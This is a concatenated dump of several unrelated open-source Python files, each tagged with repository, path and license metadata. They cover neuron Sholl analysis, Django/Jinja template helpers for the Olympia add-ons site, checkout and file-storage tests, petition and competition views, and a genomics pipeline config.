Given a neuron, the soma center is used for the concentric circles,
which range from the soma radius to the maximum radial distance
in steps of `step_size`. When a population is given, the concentric
circles range from the smallest soma radius to the largest radial neurite
distance. Finally, each segment of the neuron is tested, so a neurite that
bends back on itself and crosses the same Sholl radius will get counted as
having crossed multiple times.
'''
nrns = neuron_population(nrn)
neurite_filter = is_type(neurite_type)
min_soma_edge = float('Inf')
max_radii = 0
neurites_list = []
for neuron in nrns:
neurites_list.extend(((neurites, neuron.soma.center)
for neurites in neuron.neurites
if neurite_filter(neurites)))
min_soma_edge = min(min_soma_edge, neuron.soma.radius)
max_radii = max(max_radii, np.max(np.abs(bounding_box(neuron))))
radii = np.arange(min_soma_edge, max_radii + step_size, step_size)
ret = np.zeros_like(radii)
for neurites, center in neurites_list:
ret += sholl_crossings(neurites, center, radii)
return ret
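# For example (hypothetical call), sholl_frequency(nrn,
# neurite_type=NeuriteType.axon, step_size=5) counts axonal crossings of
# circles spaced 5 um apart, starting at the soma radius.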
|
eleftherioszisis/NeuroM
|
neurom/fst/_neuronfunc.py
|
Python
|
bsd-3-clause
| 10,088
|
import collections
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters, loader
from django.utils.encoding import smart_text
from django.utils.functional import lazy
from django.utils.html import format_html as django_format_html
from django.utils.safestring import mark_safe
from django.utils.translation import (
get_language, to_locale, trim_whitespace, ugettext)
import jinja2
import waffle
from babel.support import Format
from django_jinja import library
from rest_framework.reverse import reverse as drf_reverse
from rest_framework.settings import api_settings
from olympia import amo
from olympia.amo import urlresolvers, utils
from olympia.constants.licenses import PERSONA_LICENSES_IDS
from olympia.lib.jingo_minify_helpers import (
_build_html, _get_compiled_css_url, get_css_urls, get_js_urls, get_path,
is_external)
from olympia.lib.cache import cache_get_or_set, make_key
# Registering some utils as filters:
urlparams = library.filter(utils.urlparams)
library.filter(utils.epoch)
library.filter(utils.isotime)
library.global_function(dict)
library.global_function(utils.randslice)
# Mark a lazy marked instance as safe but keep
# it lazy
mark_safe_lazy = lazy(mark_safe, unicode)
@library.global_function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@library.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@library.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@library.global_function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@library.global_function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
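# Template usage sketch (the view name below is hypothetical):
#   {{ url('addons.detail', addon.slug, src='homepage') }}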
@library.global_function
@jinja2.contextfunction
def drf_url(context, viewname, *args, **kwargs):
"""Helper for DjangoRestFramework's ``reverse`` in templates."""
request = context.get('request')
if request:
if not hasattr(request, 'versioning_scheme'):
request.versioning_scheme = api_settings.DEFAULT_VERSIONING_CLASS()
request.version = request.versioning_scheme.determine_version(
request, *args, **kwargs)
return drf_reverse(viewname, request=request, args=args, kwargs=kwargs)
@library.global_function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@library.filter
def paginator(pager):
return PaginationRenderer(pager).render()
@library.filter
def impala_paginator(pager):
t = loader.get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@library.global_function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class PaginationRenderer(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
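# Worked example: with the default max of 10 (span 4), requesting page 7 of
# 20 total pages yields the window [4, 5, 6, 7, 8, 9, 10].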
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = loader.get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = get_language()
return Format(utils.get_locale_from_lang(lang))
@library.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@library.global_function
@jinja2.contextfunction
def page_title(context, title):
title = smart_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return django_format_html(u'{} :: {}', title, base_title)
@library.filter
def json(s):
return jsonlib.dumps(s)
@library.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@library.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@library.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@library.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@library.global_function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
from olympia.versions.models import License
if isinstance(license, (long, int)):
if license in PERSONA_LICENSES_IDS:
# Grab built-in license.
license = PERSONA_LICENSES_IDS[license]
else:
# Grab custom license.
license = License.objects.filter(id=license)
if not license.exists():
return ''
license = license[0]
elif not license:
return ''
if not getattr(license, 'builtin', True):
return ugettext('Custom License')
template = loader.get_template('amo/license_link.html')
return jinja2.Markup(template.render({'license': license}))
@library.global_function
def field(field, label=None, **attrs):
if label is not None:
field.label = label
# HTML from Django is already escaped.
return jinja2.Markup(u'%s<p>%s%s</p>' %
(field.errors, field.label_tag(),
field.as_widget(attrs=attrs)))
@library.global_function
@library.render_with('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
d = dict(context.items())
d.update(key=key, prefix=prefix)
return d
@library.filter
def timesince(time):
if not time:
return u''
ago = defaultfilters.timesince(time)
# L10n: relative time in the past, like '4 days ago'
return ugettext(u'{0} ago').format(ago)
@library.global_function
@library.render_with('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
d = dict(context.items())
d.update(form=form)
return d
@library.filter
def is_choice_field(value):
try:
return isinstance(value.field.widget, CheckboxInput)
except AttributeError:
pass
@library.global_function
@jinja2.contextfunction
def cache_buster(context, url):
if 'BUILD_ID' in context:
build = context['BUILD_ID']
else:
if url.endswith('.js'):
build = context['BUILD_ID_JS']
elif url.endswith('.css'):
build = context['BUILD_ID_CSS']
else:
build = context['BUILD_ID_IMG']
return utils.urlparams(url, b=build)
@library.global_function
@jinja2.contextfunction
def media(context, url):
"""Get a MEDIA_URL link with a cache buster querystring."""
return urljoin(settings.MEDIA_URL, cache_buster(context, url))
@library.global_function
@jinja2.contextfunction
def static(context, url):
"""Get a STATIC_URL link with a cache buster querystring."""
return urljoin(settings.STATIC_URL, cache_buster(context, url))
@library.global_function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@library.global_function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
app = context['request'].APP.id
cat = str(category.id) if category else 'all'
cache_key = make_key(
'side-nav-%s-%s-%s' % (app, addon_type, cat),
# We have potentially very long names in the cache-key,
# normalize to not hit any memcached key-limits
normalize=True)
return cache_get_or_set(
cache_key, lambda: _side_nav(context, addon_type, category))
def _side_nav(context, addon_type, cat):
# Prevent helpers generating circular imports.
from olympia.addons.models import Category, Addon
request = context['request']
qs = Category.objects.filter(weight__gte=0)
if addon_type != amo.ADDON_PERSONA:
qs = qs.filter(application=request.APP.id)
sort_key = attrgetter('weight', 'name')
categories = sorted(qs.filter(type=addon_type), key=sort_key)
if cat:
base_url = cat.get_url_path()
else:
base_url = Addon.get_type_url(addon_type)
ctx = dict(request=request, base_url=base_url, categories=categories,
addon_type=addon_type, amo=amo)
template = loader.get_template('amo/side_nav.html')
return jinja2.Markup(template.render(ctx))
@library.global_function
@jinja2.contextfunction
def site_nav(context):
app = context['request'].APP.id
cache_key = make_key('site-nav-%s' % app, normalize=True)
return cache_get_or_set(cache_key, lambda: _site_nav(context))
def _site_nav(context):
# Prevent helpers from generating circular imports.
from olympia.addons.models import Category
request = context['request']
def sorted_cats(qs):
return sorted(qs, key=attrgetter('weight', 'name'))
extensions = Category.objects.filter(
application=request.APP.id, weight__gte=0, type=amo.ADDON_EXTENSION)
personas = Category.objects.filter(weight__gte=0, type=amo.ADDON_PERSONA)
ctx = dict(request=request, amo=amo,
extensions=sorted_cats(extensions),
personas=sorted_cats(personas))
template = loader.get_template('amo/site_nav.html')
return jinja2.Markup(template.render(ctx))
@library.global_function
def loc(s):
"""A noop function for strings that are not ready to be localized."""
return trim_whitespace(s)
@library.global_function
def site_event_type(type):
return amo.SITE_EVENT_CHOICES[type]
@library.global_function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
"""Wrapper for urlresolvers.remora_url"""
if lang is None:
_lang = context['LANG']
if _lang:
lang = to_locale(_lang).replace('_', '-')
if app is None:
try:
app = context['APP'].short
except (AttributeError, KeyError):
pass
return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@library.global_function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
try:
getattr(obj, attr)
return True
except ObjectDoesNotExist:
return False
@library.global_function
def no_results_amo():
# This prints a "No results found" message. That's all. Carry on.
t = loader.get_template('amo/no_results.html').render()
return jinja2.Markup(t)
def _relative_to_absolute(url):
"""
Prepends relative URLs with STATIC_URL so that they can be inlined.
This method is intended to be used as the ``repl`` parameter of
``re.sub``.
"""
url = url.group(1).strip('"\'')
if not url.startswith(('data:', 'http:', 'https:', '//')):
url = url.replace('../../', settings.STATIC_URL)
return 'url(%s)' % url
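# Illustrative sketch of how this replacer is meant to be applied (it mirrors
# the call in ``inline_css`` below):
#   css_parsed = re.sub(r'url\(([^)]*?)\)', _relative_to_absolute, css_content)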
@library.global_function
def inline_css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single style tag for each css file.
If we are not in debug mode, return a style that contains bundle-min.css.
Forces a regular css() call for external URLs (no inline allowed).
Extracted from jingo-minify and re-registered, see:
https://github.com/jsocol/jingo-minify/pull/41
Added: turns relative links to absolute ones using STATIC_URL.
"""
if debug is None:
debug = getattr(settings, 'DEBUG', False)
if debug:
items = [_get_compiled_css_url(i)
for i in settings.MINIFY_BUNDLES['css'][bundle]]
else:
items = ['css/%s-min.css' % bundle]
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
contents = []
for css in items:
if is_external(css):
return _build_html([css], '<link rel="stylesheet" media="%s" '
'href="%%s" />' % media)
with open(get_path(css), 'r') as f:
css_content = f.read()
css_parsed = re.sub(r'url\(([^)]*?)\)',
_relative_to_absolute,
css_content)
contents.append(css_parsed)
return _build_html(contents, '<style type="text/css" media="%s">%%s'
'</style>' % media)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_path(what):
"""Make it possible to override storage paths in settings.
By default, all storage paths are in the MEDIA_ROOT.
This is backwards compatible.
"""
default = os.path.join(settings.MEDIA_ROOT, what)
key = "{0}_PATH".format(what.upper())
return getattr(settings, key, default)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_url(what):
"""
Generate default media url, and make possible to override it from
settings.
"""
default = '%s%s/' % (settings.MEDIA_URL, what)
key = "{0}_URL".format(what.upper().replace('-', '_'))
return getattr(settings, key, default)
def id_to_path(pk):
"""
Generate a path from an id, to distribute folders in the file system.
1 => 1/1/1
12 => 2/12/12
123456 => 6/56/123456
"""
pk = unicode(pk)
path = [pk[-1]]
if len(pk) >= 2:
path.append(pk[-2:])
else:
path.append(pk)
path.append(pk)
return os.path.join(*path)
@library.filter
def hidden_field(field):
return field.as_widget(attrs={'style': 'display:none'})
@library.filter
def format_html(string, *args, **kwargs):
"""Uses ``str.format`` for string interpolation.
Uses ``django.utils.html:format_html`` internally.
>>> {{ "{0} arguments, {x} arguments"|format_html('args', x='kwargs') }}
"positional args, kwargs arguments"
Checks both, *args and **kwargs for potentially unsafe arguments (
not marked as `mark_safe`) and escapes them appropriately.
"""
return django_format_html(smart_text(string), *args, **kwargs)
@library.global_function
def js(bundle, debug=None, defer=False, async=False):
"""
If we are in debug mode, just output a single script tag for each js file.
If we are not in debug mode, return a script that points at bundle-min.js.
Copied from jingo-minify until we switch to something better...
"""
attrs = []
urls = get_js_urls(bundle, debug)
attrs.append('src="%s"')
if defer:
attrs.append('defer')
if async:
attrs.append('async')
return _build_html(urls, '<script %s></script>' % ' '.join(attrs))
@library.global_function
def css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single link tag for each css file.
If we are not in debug mode, return a link that points at bundle-min.css.
"""
urls = get_css_urls(bundle, debug)
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
return _build_html(urls, '<link rel="stylesheet" media="%s" href="%%s" />'
% media)
@library.filter
def nl2br(string):
"""Turn newlines into <br/>."""
if not string:
return ''
return jinja2.Markup('<br/>'.join(jinja2.escape(string).splitlines()))
@library.filter(name='date')
def format_date(value, format='DATE_FORMAT'):
return defaultfilters.date(value, format)
@library.filter(name='datetime')
def format_datetime(value, format='DATETIME_FORMAT'):
return defaultfilters.date(value, format)
@library.filter
def class_selected(a, b):
"""Return ``'class="selected"'`` if ``a == b``."""
return mark_safe('class="selected"' if a == b else '')
|
lavish205/olympia
|
src/olympia/amo/templatetags/jinja_helpers.py
|
Python
|
bsd-3-clause
| 19,484
|
from django.db import models
from django.contrib.auth.models import User
class OdooUser(models.Model):
user = models.OneToOneField(User)
odoo_id = models.BigIntegerField(primary_key=True)
username = models.CharField(max_length=256)
|
JulienDrecq/django-odoo-auth
|
odoo_auth/models.py
|
Python
|
bsd-3-clause
| 246
|
import pytest
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from mock import MagicMock, Mock
from prices import Price
from saleor.checkout import views
from saleor.checkout.core import STORAGE_SESSION_KEY, Checkout
from saleor.shipping.models import ShippingMethodCountry
from saleor.userprofile.models import Address
def test_checkout_version():
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
storage = checkout.for_storage()
assert storage['version'] == Checkout.VERSION
@pytest.mark.parametrize('storage_data, expected_storage', [
({'version': Checkout.VERSION, 'new': 1}, {'version': Checkout.VERSION, 'new': 1}),
({'version': 'wrong', 'new': 1}, {'version': Checkout.VERSION}),
({'new': 1}, {'version': Checkout.VERSION}),
({}, {'version': Checkout.VERSION}),
(None, {'version': Checkout.VERSION}),
])
def test_checkout_version_with_from_storage(storage_data, expected_storage):
checkout = Checkout.from_storage(
storage_data, Mock(), AnonymousUser(), 'tracking_code')
storage = checkout.for_storage()
assert storage == expected_storage
def test_checkout_clear_storage():
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['new'] = 1
checkout.clear_storage()
assert checkout.storage is None
assert checkout.modified is True
def test_checkout_is_shipping_required():
cart = Mock(is_shipping_required=Mock(return_value=True))
checkout = Checkout(cart, AnonymousUser(), 'tracking_code')
assert checkout.is_shipping_required is True
def test_checkout_deliveries():
partition = Mock(
get_total=Mock(return_value=Price(10, currency=settings.DEFAULT_CURRENCY)),
get_price_per_item=Mock(return_value=Price(10, currency=settings.DEFAULT_CURRENCY)))
def f():
yield partition
partition.__iter__ = Mock(return_value=f())
cart = Mock(partition=Mock(return_value=[partition]),
currency=settings.DEFAULT_CURRENCY)
checkout = Checkout(
cart, AnonymousUser(), 'tracking_code')
deliveries = list(checkout.deliveries)
assert deliveries[0][1] == Price(0, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][2] == partition.get_total()
assert deliveries[0][0][0][0] == partition
def test_checkout_deliveries_with_shipping_method(monkeypatch):
shipping_cost = 5
items_cost = 5
partition = Mock(
is_shipping_required=MagicMock(return_value=True),
get_total=Mock(return_value=Price(items_cost, currency=settings.DEFAULT_CURRENCY)),
get_price_per_item=Mock(return_value=Price(items_cost, currency=settings.DEFAULT_CURRENCY)))
def f():
yield partition
partition.__iter__ = Mock(return_value=f())
cart = Mock(partition=Mock(return_value=[partition]),
currency=settings.DEFAULT_CURRENCY)
shipping_method_mock = Mock(get_total=Mock(return_value=Price(shipping_cost, currency=settings.DEFAULT_CURRENCY)))
monkeypatch.setattr(Checkout, 'shipping_method', shipping_method_mock)
checkout = Checkout(
cart, AnonymousUser(), 'tracking_code')
deliveries = list(checkout.deliveries)
assert deliveries[0][1] == Price(shipping_cost, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][2] == Price(items_cost + shipping_cost, currency=settings.DEFAULT_CURRENCY)
assert deliveries[0][0][0][0] == partition
@pytest.mark.parametrize('user, shipping', [
(Mock(default_shipping_address='user_shipping'), 'user_shipping'),
(AnonymousUser(), None),
])
def test_checkout_shipping_address_with_anonymous_user(user, shipping):
checkout = Checkout(Mock(), user, 'tracking_code')
assert checkout.shipping_address == shipping
@pytest.mark.parametrize('address_objects, shipping', [
(Mock(get=Mock(return_value='shipping')), 'shipping'),
(Mock(get=Mock(side_effect=Address.DoesNotExist)), None),
])
def test_checkout_shipping_address_with_storage(address_objects, shipping, monkeypatch):
monkeypatch.setattr('saleor.checkout.core.Address.objects', address_objects)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_address'] = {'id': 1}
assert checkout.shipping_address == shipping
def test_checkout_shipping_address_setter():
address = Address(first_name='Jan', last_name='Kowalski')
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.shipping_address = address
assert checkout.storage['shipping_address'] == {
'city': u'', 'city_area': u'', 'company_name': u'', 'country': '', 'phone': u'',
'country_area': u'', 'first_name': 'Jan', 'id': None, 'last_name': 'Kowalski',
'postal_code': u'', 'street_address_1': u'', 'street_address_2': u''}
@pytest.mark.parametrize('shipping_address, shipping_method, value', [
(Mock(country=Mock(code='PL')),
Mock(country_code='PL', __eq__=lambda n, o: n.country_code == o.country_code),
Mock(country_code='PL')),
(Mock(country=Mock(code='DE')), Mock(country_code='PL'), None),
(None, Mock(country_code='PL'), None),
])
def test_checkout_shipping_method(shipping_address, shipping_method, value, monkeypatch):
queryset = Mock(get=Mock(return_value=shipping_method))
monkeypatch.setattr(Checkout, 'shipping_address', shipping_address)
monkeypatch.setattr('saleor.checkout.core.ShippingMethodCountry.objects', queryset)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_method_country_id'] = 1
assert checkout.shipping_method == value
def test_checkout_shipping_does_not_exists(monkeypatch):
queryset = Mock(get=Mock(side_effect=ShippingMethodCountry.DoesNotExist))
monkeypatch.setattr('saleor.checkout.core.ShippingMethodCountry.objects', queryset)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
checkout.storage['shipping_method_country_id'] = 1
assert checkout.shipping_method is None
def test_checkout_shipping_method_setter():
shipping_method = Mock(id=1)
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
assert checkout.modified is False
checkout.shipping_method = shipping_method
assert checkout.modified is True
assert checkout.storage['shipping_method_country_id'] == 1
@pytest.mark.parametrize('user, address', [
(AnonymousUser(), None),
(Mock(default_billing_address='billing_address',
addresses=Mock(is_authenticated=Mock(return_value=True))), 'billing_address'),
])
def test_checkout_billing_address(user, address):
checkout = Checkout(Mock(), user, 'tracking_code')
assert checkout.billing_address == address
@pytest.mark.parametrize('cart, status_code, url', [
(Mock(__len__=Mock(return_value=0)), 302, '/cart/'),
(Mock(__len__=Mock(return_value=1),
is_shipping_required=Mock(return_value=True)),
302, '/checkout/shipping-address/'),
(Mock(__len__=Mock(return_value=1),
is_shipping_required=Mock(return_value=False)),
302, '/checkout/summary/'),
(Mock(__len__=Mock(return_value=0),
is_shipping_required=Mock(return_value=False)), 302, '/cart/'),
])
def test_index_view(cart, status_code, url, rf):
checkout = Checkout(cart, AnonymousUser(), 'tracking_code')
request = rf.get('checkout:index')
request.user = checkout.user
request.session = {STORAGE_SESSION_KEY: checkout.for_storage()}
request.discounts = []
response = views.index_view(request, checkout, checkout.cart)
assert response.status_code == status_code
assert response.url == url
|
rodrigozn/CW-Shop
|
tests/test_checkout.py
|
Python
|
bsd-3-clause
| 7,657
|
from __future__ import absolute_import
from django.core.files.base import ContentFile
from sentry.models import File, FileBlob
from sentry.testutils import TestCase
class FileBlobTest(TestCase):
def test_from_file(self):
fileobj = ContentFile("foo bar")
my_file1 = FileBlob.from_file(fileobj)
assert my_file1.path
my_file2 = FileBlob.from_file(fileobj)
# deep check
assert my_file1.id == my_file2.id
assert my_file1.checksum == my_file2.checksum
assert my_file1.path == my_file2.path
class FileTest(TestCase):
def test_file_handling(self):
fileobj = ContentFile("foo bar")
file1 = File.objects.create(
name='baz.js',
type='default',
size=7,
)
results = file1.putfile(fileobj, 3)
assert len(results) == 3
assert results[0].offset == 0
assert results[1].offset == 3
assert results[2].offset == 6
fp = None
with file1.getfile() as fp:
assert fp.read() == 'foo bar'
fp.seek(2)
assert fp.tell() == 2
assert fp.read() == 'o bar'
fp.seek(0)
assert fp.tell() == 0
assert fp.read() == 'foo bar'
fp.seek(4)
assert fp.tell() == 4
assert fp.read() == 'bar'
fp.seek(1000)
assert fp.tell() == 1000
with self.assertRaises(IOError):
fp.seek(-1)
with self.assertRaises(ValueError):
fp.seek(0)
with self.assertRaises(ValueError):
fp.tell()
with self.assertRaises(ValueError):
fp.read()
|
mitsuhiko/sentry
|
tests/sentry/models/test_file.py
|
Python
|
bsd-3-clause
| 1,674
|
from django.test import TestCase
from django.urls import reverse
from .utils import add_default_data
from petition.models import PytitionUser, Permission, Organization, Petition
class DelSlugViewTest(TestCase):
"""Test del_slug view"""
@classmethod
def setUpTestData(cls):
add_default_data()
def login(self, name, password=None):
self.client.login(username=name, password=password if password else name)
self.pu = PytitionUser.objects.get(user__username=name)
return self.pu
def logout(self):
self.client.logout()
def test_DelSlugViewOk(self):
john = self.login("john")
john_perms = Permission.objects.get(organization__slugname="attac", user=john)
john_perms.can_modify_petitions = True
john_perms.save()
petition = Petition.objects.filter(org__slugname="attac").first()
slug = petition.slugmodel_set.first()
response = self.client.get(reverse("del_slug", kwargs={'petition_id': petition.id})+"?slugid="+str(slug.id),
follow=True)
self.assertRedirects(response, reverse("edit_petition", args=[petition.id]) + "#tab_social_network_form")
|
fallen/Pytition
|
pytition/petition/tests/tests_DelSlugView.py
|
Python
|
bsd-3-clause
| 1,208
|
from django.views.generic import ListView, DetailView
from django.core.exceptions import ObjectDoesNotExist
from competition.models.competition_model import Competition
class CompetitionListView(ListView):
"""Lists every single competition"""
context_object_name = 'competitions'
model = Competition
template_name = 'competition/competition/competition_list.html'
paginate_by = 10
class CompetitionDetailView(DetailView):
"""Shows details about a particular competition"""
context_object_name = 'competition'
model = Competition
slug_url_kwarg = 'comp_slug'
template_name = 'competition/competition/competition_detail.html'
def get_context_data(self, **kwargs):
context = super(CompetitionDetailView, self).get_context_data(**kwargs)
competition = self.object
user = self.request.user
context['user_registered'] = competition.is_user_registered(user)
context['user_team'] = None
try:
if not user.is_anonymous():
context['user_team'] = competition.team_set.get(members=user.pk)
except ObjectDoesNotExist:
pass
return context
|
michaelwisely/django-competition
|
src/competition/views/competition_views.py
|
Python
|
bsd-3-clause
| 1,178
|
## Absolute location where all raw files are
RAWDATA_DIR = '/home/cmb-06/as/skchoudh/dna/Oct_10_2016_HuR_Human_Mouse_Liver/rna-seq/Penalva_L_08182016/human'
## Output directory
OUT_DIR = '/staging/as/skchoudh/Oct_10_2016_HuR_Human_Mouse_Liver/RNA-Seq_human'
## Absolute location to 're-ribo/scripts' directory
SRC_DIR = '/home/cmb-panasas2/skchoudh/github_projects/re-ribo/scripts'
## Genome fasta location
GENOME_FASTA = '/home/cmb-panasas2/skchoudh/genomes/hg38/fasta/hg38.fa'
## Chromosome sizes location
CHROM_SIZES = '/home/cmb-panasas2/skchoudh/genomes/hg38/fasta/hg38.chrom.sizes'
## Path to STAR index (will be generated if does not exist)
STAR_INDEX = '/home/cmb-panasas2/skchoudh/genomes/hg38/star_annotated'
## GTF path
GTF = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.annotation.without_rRNA_tRNA.gtf'
## GenePred bed downloaded from UCSC
## (this is used for inferring the type of experiment, i.e. stranded/non-stranded,
## and hence is not required)
GENE_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v24.genes.bed'
## Path to bed file with start codon coordinates
START_CODON_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.start_codon.bed'
## Path to bed file with stop codon coordinates
STOP_CODON_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.stop_codon.bed'
## Path to bed file containing CDS coordinates
CDS_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.cds.bed'
# We don't have these, so just use the CDS bed to get the pipeline running
UTR5_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.UTR5.bed'
UTR3_BED = '/home/cmb-panasas2/skchoudh/genomes/hg38/annotation/gencode.v25.gffutils.UTR3.bed'
## Name of python2 environment
## The following package needs to be installed in that environment
## numpy scipy matplotlib seaborn pysam pybedtools htseq
## you can do: conda create -n python2 python=2 && source activate python2 && conda install numpy scipy matplotlib seaborn pysam pybedtools htseq
PYTHON2ENV = 'python2'
############################################Do Not Edit#############################################
HTSEQ_STRANDED = 'yes'
FEATURECOUNTS_S = '-s 1'
FEATURECOUNTS_T = 'CDS'
HTSEQ_MODE = 'intersection-strict'
|
saketkc/ribo-seq-snakemake
|
configs/Oct_10_2016_HuR_Human_rna.py
|
Python
|
bsd-3-clause
| 2,343
|
"""
Tests for django-registration's built-in views.
"""
from django.core.urlresolvers import reverse
from django.test import override_settings, TestCase
from ..models import RegistrationProfile
@override_settings(ROOT_URLCONF='registration.tests.urls')
class ActivationViewTests(TestCase):
"""
Tests for aspects of the activation view not currently exercised
by any built-in workflow.
"""
@override_settings(ACCOUNT_ACTIVATION_DAYS=7)
def test_activation(self):
"""
Activation of an account functions properly when using a
simple string URL as the success redirect.
"""
data = {
'username': 'bob',
'email': 'bob@example.com',
'password1': 'secret',
'password2': 'secret'
}
resp = self.client.post(
reverse('registration_register'),
data=data
)
profile = RegistrationProfile.objects.get(
user__username=data['username']
)
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': profile.activation_key}
)
)
self.assertRedirects(resp, '/')
|
tdruez/django-registration
|
registration/tests/test_views.py
|
Python
|
bsd-3-clause
| 1,271
|
from __future__ import absolute_import
import six
import pytest
import base64
from sentry.utils.compat import mock
from exam import fixture
from six.moves.urllib.parse import urlencode, urlparse, parse_qs
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from sentry.auth.authenticators import TotpInterface
from sentry.auth.providers.saml2.provider import SAML2Provider, Attributes, HAS_SAML2
from sentry.models import (
AuditLogEntry,
AuditLogEntryEvent,
AuthProvider,
Organization,
)
from sentry.testutils import AuthProviderTestCase
from sentry.testutils.helpers import Feature
from sentry.utils.compat import map
dummy_provider_config = {
"idp": {
"entity_id": "https://example.com/saml/metadata/1234",
"x509cert": "foo_x509_cert",
"sso_url": "http://example.com/sso_url",
"slo_url": "http://example.com/slo_url",
},
"attribute_mapping": {
Attributes.IDENTIFIER: "user_id",
Attributes.USER_EMAIL: "email",
Attributes.FIRST_NAME: "first_name",
Attributes.LAST_NAME: "last_name",
},
}
